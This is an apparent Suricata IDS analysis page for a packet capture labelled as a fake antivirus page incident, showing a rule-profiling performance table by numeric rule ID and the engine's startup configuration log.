Filename: 2018-01-06-fake-AV-page-after-viewing-prelatureofayaviri.org.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 24.4300119877 seconds
Hash: ee5317774464e42d2b80588913a48839
Uploaded: 1542805526

Logfiles


suricata-4.0.0-etpro-all-perf.txt-2018-11-21-T-13-05-51-11212018.1305-2018-01-06-fake-AV-page-after-viewing-prelatureofayaviri.org.pcap.txt - (37335 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 11/21/2018 -- 13:05:51. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2809272      1        1        451450       2.80   16       0        388335      28215.62    0.00        28215.62   
  2        2018342      1        2        302896       1.88   2        0        215126      151448.00   0.00        151448.00  
  3        2826332      1        2        194268       1.20   1        0        194268      194268.00   0.00        194268.00  
  4        2016333      1        4        168791       1.05   1        0        168791      168791.00   0.00        168791.00  
  5        2017166      1        4        154227       0.96   1        0        154227      154227.00   0.00        154227.00  
  6        2826092      1        2        199283       1.23   2        0        120548      99641.50    0.00        99641.50   
  7        2809313      1        2        117314       0.73   1        0        117314      117314.00   0.00        117314.00  
  8        2816910      1        2        312205       1.93   5        0        94935       62441.00    0.00        62441.00   
  9        2017072      1        3        93394        0.58   1        0        93394       93394.00    0.00        93394.00   
  10       2814570      1        4        201712       1.25   3        0        92072       67237.33    0.00        67237.33   
  11       2012325      1        4        87987        0.54   1        1        87987       87987.00    87987.00    0.00       
  12       2814832      1        2        82290        0.51   1        0        82290       82290.00    0.00        82290.00   
  13       2827094      1        2        77733        0.48   1        0        77733       77733.00    0.00        77733.00   
  14       2021267      1        2        156003       0.97   6        0        77367       26000.50    0.00        26000.50   
  15       2807202      1        2        77302        0.48   1        0        77302       77302.00    0.00        77302.00   
  16       2815568      1        2        73572        0.46   1        0        73572       73572.00    0.00        73572.00   
  17       2816909      1        2        313962       1.94   5        0        72418       62792.40    0.00        62792.40   
  18       2816940      1        2        290611       1.80   5        0        70776       58122.20    0.00        58122.20   
  19       2025064      1        5        242772       1.50   5        0        65807       48554.40    0.00        48554.40   
  20       2816928      1        3        205924       1.28   5        0        64734       41184.80    0.00        41184.80   
  21       2821839      1        2        181367       1.12   4        0        63877       45341.75    0.00        45341.75   
  22       2019094      1        5        59618        0.37   1        0        59618       59618.00    0.00        59618.00   
  23       2811399      1        2        59534        0.37   1        0        59534       59534.00    0.00        59534.00   
  24       2023055      1        2        58924        0.36   1        1        58924       58924.00    58924.00    0.00       
  25       2816929      1        4        191953       1.19   5        0        57537       38390.60    0.00        38390.60   
  26       2827062      1        2        55890        0.35   1        1        55890       55890.00    55890.00    0.00       
  27       2816525      1        10       201842       1.25   5        0        55146       40368.40    0.00        40368.40   
  28       2812614      1        2        55020        0.34   1        0        55020       55020.00    0.00        55020.00   
  29       2019230      1        2        74267        0.46   2        0        54857       37133.50    0.00        37133.50   
  30       2815817      1        5        179647       1.11   5        0        54739       35929.40    0.00        35929.40   
  31       2821384      1        2        53461        0.33   1        0        53461       53461.00    0.00        53461.00   
  32       2809850      1        2        52595        0.33   1        0        52595       52595.00    0.00        52595.00   
  33       2021413      1        2        52568        0.33   1        0        52568       52568.00    0.00        52568.00   
  34       2022466      1        5        52376        0.32   1        0        52376       52376.00    0.00        52376.00   
  35       2024845      1        2        51987        0.32   1        0        51987       51987.00    0.00        51987.00   
  36       2810889      1        3        51758        0.32   1        0        51758       51758.00    0.00        51758.00   
  37       2025345      1        2        51376        0.32   1        1        51376       51376.00    51376.00    0.00       
  38       2022901      1        2        51050        0.32   1        0        51050       51050.00    0.00        51050.00   
  39       2022031      1        4        50908        0.32   1        0        50908       50908.00    0.00        50908.00   
  40       2009702      1        5        146684       0.91   8        0        50494       18335.50    0.00        18335.50   
  41       2020979      1        3        50399        0.31   1        0        50399       50399.00    0.00        50399.00   
  42       2015781      1        2        76998        0.48   2        0        50361       38499.00    0.00        38499.00   
  43       2019343      1        3        172064       1.07   5        0        50216       34412.80    0.00        34412.80   
  44       2820851      1        5        216930       1.34   5        0        49444       43386.00    0.00        43386.00   
  45       2814837      1        2        49307        0.31   1        0        49307       49307.00    0.00        49307.00   
  46       2809363      1        3        47848        0.30   1        0        47848       47848.00    0.00        47848.00   
  47       2807970      1        8        47087        0.29   1        0        47087       47087.00    0.00        47087.00   
  48       2823855      1        7        69859        0.43   2        0        47053       34929.50    0.00        34929.50   
  49       2024139      1        2        45811        0.28   1        0        45811       45811.00    0.00        45811.00   
  50       2816927      1        3        197376       1.22   5        0        45034       39475.20    0.00        39475.20   
  51       2022502      1        4        158062       0.98   5        0        44836       31612.40    0.00        31612.40   
  52       2015877      1        6        44756        0.28   1        0        44756       44756.00    0.00        44756.00   
  53       2829394      1        1        186550       1.16   5        0        44736       37310.00    0.00        37310.00   
  54       2014701      1        12       129051       0.80   8        0        44675       16131.38    0.00        16131.38   
  55       2816327      1        4        188113       1.16   5        0        43855       37622.60    0.00        37622.60   
  56       2823169      1        2        43640        0.27   1        0        43640       43640.00    0.00        43640.00   
  57       2814472      1        4        113254       0.70   3        0        43561       37751.33    0.00        37751.33   
  58       2824975      1        2        43061        0.27   1        0        43061       43061.00    0.00        43061.00   
  59       2816924      1        4        148587       0.92   5        0        42646       29717.40    0.00        29717.40   
  60       2016537      1        2        434593       2.69   26       0        42433       16715.12    0.00        16715.12   
  61       2830124      1        1        98482        0.61   3        0        41699       32827.33    0.00        32827.33   
  62       2816930      1        4        145560       0.90   5        0        41659       29112.00    0.00        29112.00   
  63       2024829      1        2        41459        0.26   1        0        41459       41459.00    0.00        41459.00   
  64       2805058      1        3        41332        0.26   1        0        41332       41332.00    0.00        41332.00   
  65       2823663      1        3        63363        0.39   2        0        41201       31681.50    0.00        31681.50   
  66       2821471      1        2        41056        0.25   1        0        41056       41056.00    0.00        41056.00   
  67       2816925      1        3        166219       1.03   5        0        40335       33243.80    0.00        33243.80   
  68       2816922      1        5        154267       0.96   5        0        39813       30853.40    0.00        30853.40   
  69       2829848      1        2        119911       0.74   4        0        39776       29977.75    0.00        29977.75   
  70       2829644      1        1        100714       0.62   3        0        39647       33571.33    0.00        33571.33   
  71       2021418      1        9        39490        0.24   1        0        39490       39490.00    0.00        39490.00   
  72       2016706      1        20       38990        0.24   1        0        38990       38990.00    0.00        38990.00   
  73       2022802      1        2        38333        0.24   1        0        38333       38333.00    0.00        38333.00   
  74       2815886      1        2        75376        0.47   3        0        38263       25125.33    0.00        25125.33   
  75       2811740      1        2        140376       0.87   5        0        37550       28075.20    0.00        28075.20   
  76       2020181      1        8        36666        0.23   1        0        36666       36666.00    0.00        36666.00   
  77       2823858      1        3        36236        0.22   1        0        36236       36236.00    0.00        36236.00   
  78       2012810      1        10       103383       0.64   3        3        36123       34461.00    34461.00    0.00       
  79       2804626      1        9        128204       0.79   5        0        35844       25640.80    0.00        25640.80   
  80       2827279      1        5        119888       0.74   5        0        35690       23977.60    0.00        23977.60   
  81       2815659      1        3        35403        0.22   1        0        35403       35403.00    0.00        35403.00   
  82       2816931      1        3        141923       0.88   5        0        35303       28384.60    0.00        28384.60   
  83       2807793      1        4        35283        0.22   1        0        35283       35283.00    0.00        35283.00   
  84       2024133      1        2        35116        0.22   1        0        35116       35116.00    0.00        35116.00   
  85       2828060      1        4        154111       0.95   5        0        35022       30822.20    0.00        30822.20   
  86       2828986      1        2        118193       0.73   4        0        34989       29548.25    0.00        29548.25   
  87       2819673      1        4        160072       0.99   5        0        34612       32014.40    0.00        32014.40   
  88       2024142      1        2        34593        0.21   1        0        34593       34593.00    0.00        34593.00   
  89       2017948      1        2        33820        0.21   1        0        33820       33820.00    0.00        33820.00   
  90       2024140      1        2        33788        0.21   1        0        33788       33788.00    0.00        33788.00   
  91       2024134      1        2        33240        0.21   1        0        33240       33240.00    0.00        33240.00   
  92       2024137      1        2        33237        0.21   1        0        33237       33237.00    0.00        33237.00   
  93       2017567      1        3        59673        0.37   2        0        33230       29836.50    0.00        29836.50   
  94       2024138      1        2        33027        0.20   1        0        33027       33027.00    0.00        33027.00   
  95       2024141      1        2        33025        0.20   1        0        33025       33025.00    0.00        33025.00   
  96       2830035      1        2        75906        0.47   3        0        32979       25302.00    0.00        25302.00   
  97       2024135      1        2        32880        0.20   1        0        32880       32880.00    0.00        32880.00   
  98       2816526      1        13       147817       0.92   5        0        32701       29563.40    0.00        29563.40   
  99       2024136      1        2        32655        0.20   1        0        32655       32655.00    0.00        32655.00   
  100      2816328      1        5        141014       0.87   5        0        32355       28202.80    0.00        28202.80   
  101      2821615      1        2        143972       0.89   5        0        31555       28794.40    0.00        28794.40   
  102      2020855      1        3        117044       0.72   5        0        30675       23408.80    0.00        23408.80   
  103      2016726      1        6        59243        0.37   2        0        29813       29621.50    0.00        29621.50   
  104      2829393      1        1        138416       0.86   5        0        29785       27683.20    0.00        27683.20   
  105      2022552      1        2        55764        0.35   2        0        29166       27882.00    0.00        27882.00   
  106      2025162      1        2        83980        0.52   3        0        28700       27993.33    0.00        27993.33   
  107      2809511      1        4        28192        0.17   1        0        28192       28192.00    0.00        28192.00   
  108      2017261      1        3        28101        0.17   1        0        28101       28101.00    0.00        28101.00   
  109      2812433      1        2        27774        0.17   1        0        27774       27774.00    0.00        27774.00   
  110      2024771      1        1        27525        0.17   1        0        27525       27525.00    0.00        27525.00   
  111      2821569      1        7        27507        0.17   1        0        27507       27507.00    0.00        27507.00   
  112      2806052      1        3        27351        0.17   1        0        27351       27351.00    0.00        27351.00   
  113      2022147      1        2        27332        0.17   1        0        27332       27332.00    0.00        27332.00   
  114      2816831      1        2        48767        0.30   2        0        27277       24383.50    0.00        24383.50   
  115      2822463      1        2        52957        0.33   2        0        26802       26478.50    0.00        26478.50   
  116      2024606      1        2        26518        0.16   1        0        26518       26518.00    0.00        26518.00   
  117      2017552      1        6        461037       2.85   31       0        26435       14872.16    0.00        14872.16   
  118      2816832      1        2        46233        0.29   2        0        25932       23116.50    0.00        23116.50   
  119      2014967      1        3        25690        0.16   1        0        25690       25690.00    0.00        25690.00   
  120      2816165      1        5        106125       0.66   5        0        25515       21225.00    0.00        21225.00   
  121      2809267      1        8        68752        0.43   3        0        25261       22917.33    0.00        22917.33   
  122      2802990      1        5        64938        0.40   4        0        25202       16234.50    0.00        16234.50   
  123      2022467      1        2        91578        0.57   4        0        25026       22894.50    0.00        22894.50   
  124      2828190      1        2        112701       0.70   5        0        24122       22540.20    0.00        22540.20   
  125      2816895      1        2        

This file has been truncated. Go here to download in full.


suricata-report-2018-11-21-T-13-05-51-11212018.1305-2018-01-06-fake-AV-page-after-viewing-prelatureofayaviri.org.pcap.txt - (17968 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/ee5317774464e42d2b80588913a4883956b33745cb75ec8c950e11a498e082d2 -r /var/pcap/11212018.1305-2018-01-06-fake-AV-page-after-viewing-prelatureofayaviri.org.pcap -vvv -k none
elapsedtime:23.425587
stderr:
stdout:
21/11/2018 -- 13:05:27 - <Info> - Configuration node 'rule-files' redefined.
21/11/2018 -- 13:05:27 - <Notice> - This is Suricata version 4.0.0 RELEASE
21/11/2018 -- 13:05:27 - <Info> - CPUs/cores online: 1
21/11/2018 -- 13:05:27 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 32961 and 'request-body-inspect-window' set to 15977 after randomization.
21/11/2018 -- 13:05:27 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 33567 and 'response-body-inspect-window' set to 16458 after randomization.
21/11/2018 -- 13:05:27 - <Config> - DNS request flood protection level: 500
21/11/2018 -- 13:05:27 - <Config> - DNS per flow memcap (state-memcap): 524288
21/11/2018 -- 13:05:27 - <Config> - DNS global memcap: 16777216
21/11/2018 -- 13:05:27 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
21/11/2018 -- 13:05:27 - <Config> - preallocated 1000 hosts of size 136
21/11/2018 -- 13:05:27 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
21/11/2018 -- 13:05:27 - <Config> - using magic-file /usr/share/file/magic
21/11/2018 -- 13:05:27 - <Config> - Core dump size is unlimited.
21/11/2018 -- 13:05:27 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
21/11/2018 -- 13:05:27 - <Config> - preallocated 1000 defrag trackers of size 168
21/11/2018 -- 13:05:27 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
21/11/2018 -- 13:05:27 - <Config> - stream "prealloc-sessions": 2048 (per thread)
21/11/2018 -- 13:05:27 - <Config> - stream "memcap": 33554432
21/11/2018 -- 13:05:27 - <Config> - stream "midstream" session pickups: disabled
21/11/2018 -- 13:05:27 - <Config> - stream "async-oneside": disabled
21/11/2018 -- 13:05:27 - <Config> - stream "checksum-validation": disabled
21/11/2018 -- 13:05:27 - <Config> - stream."inline": disabled
21/11/2018 -- 13:05:27 - <Config> - stream "bypass": disabled
21/11/2018 -- 13:05:27 - <Config> - stream "max-synack-queued": 5
21/11/2018 -- 13:05:27 - <Config> - stream.reassembly "memcap": 134217728
21/11/2018 -- 13:05:27 - <Config> - stream.reassembly "depth": 0
21/11/2018 -- 13:05:27 - <Config> - stream.reassembly "toserver-chunk-size": 2676
21/11/2018 -- 13:05:27 - <Config> - stream.reassembly "toclient-chunk-size": 2475
21/11/2018 -- 13:05:27 - <Config> - stream.reassembly.raw: enabled
21/11/2018 -- 13:05:27 - <Config> - stream.reassembly "segment-prealloc": 2048
21/11/2018 -- 13:05:27 - <Config> - Delayed detect disabled
21/11/2018 -- 13:05:27 - <Config> - pattern matchers: MPM: ac, SPM: bm
21/11/2018 -- 13:05:27 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
21/11/2018 -- 13:05:27 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
21/11/2018 -- 13:05:27 - <Config> - prefilter engines: MPM
21/11/2018 -- 13:05:27 - <Config> - IP reputation disabled
21/11/2018 -- 13:05:27 - <Perf> - Registered 148 keyword profiling counters.
21/11/2018 -- 13:05:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
21/11/2018 -- 13:05:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
21/11/2018 -- 13:05:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
21/11/2018 -- 13:05:33 - <Config> - No rules loaded from ET-icmp.rules.
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
21/11/2018 -- 13:05:34 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
21/11/2018 -- 13:05:34 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
21/11/2018 -- 13:05:34 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
21/11/2018 -- 13:05:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
21/11/2018 -- 13:05:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
21/11/2018 -- 13:05:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
21/11/2018 -- 13:05:38 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
21/11/2018 -- 13:05:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
21/11/2018 -- 13:05:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
21/11/2018 -- 13:05:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
21/11/2018 -- 13:05:41 - <Config> - No rules loaded from local.rules.
21/11/2018 -- 13:05:41 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
21/11/2018 -- 13:05:41 - <Info> - Threshold config parsed: 0 rule(s) found
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for tcp-packet
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for tcp-stream
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for udp-packet
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for other-ip
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_uri
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_request_line
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_client_body
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_response_line
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_header
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_header
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_header_names
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_header_names
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_accept
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_accept_enc
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_accept_lang
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_referer
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_connection
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_content_len
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_content_len
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_content_type
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_content_type
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_protocol
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_protocol
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_start
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_start
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_raw_header
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_raw_header
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_method
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_cookie
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_cookie
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_raw_uri
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_user_agent
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_host
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_raw_host
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_stat_msg
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_stat_code
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for dns_query
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for tls_sni
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for tls_cert_issuer
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for tls_cert_subject
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for tls_cert_serial
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for dce_stub_data
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for dce_stub_data
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for ssh_protocol
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for ssh_protocol
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for ssh_software
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for ssh_software
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for file_data
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for file_data
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_request_line
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_response_line
21/11/2018 -- 13:05:42 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
21/11/2018 -- 13:05:42 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
21/11/2018 -- 13:05:42 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
21/11/2018 -- 13:05:42 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
21/11/2018 -- 13:05:42 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
21/11/2018 -- 13:05:42 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
21/11/2018 -- 13:05:42 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
21/11/2018 -- 13:05:42 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
21/11/2018 -- 13:05:48 - <Perf> - Unique rule groups: 104
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "toserver TCP packet": 35
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "toclient TCP packet": 17
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "toserver TCP stream": 33
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "toclient TCP stream": 19
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "toserver UDP packet": 27
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "toclient UDP packet": 17
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "other IP packet": 3
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_uri": 14
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_request_line": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_client_body": 6
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient http_response_line": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_header": 10
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient http_header": 6
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_header_names": 2
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_accept": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_referer": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_content_len": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_content_type": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient http_content_type": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_protocol": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_start": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_method": 5
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_cookie": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient http_cookie": 2
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_host": 2
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver dns_query": 4
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver tls_sni": 2
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver file_data": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient file_data": 7
21/11/2018 -- 13:05:50 - <Perf> - Registered 39590 rule profiling counters.
21/11/2018 -- 13:05:50 - <Info> - fast output device (regular) initialized: alert
21/11/2018 -- 13:05:50 - <Info> - eve-log output device (regular) initialized: eve.json
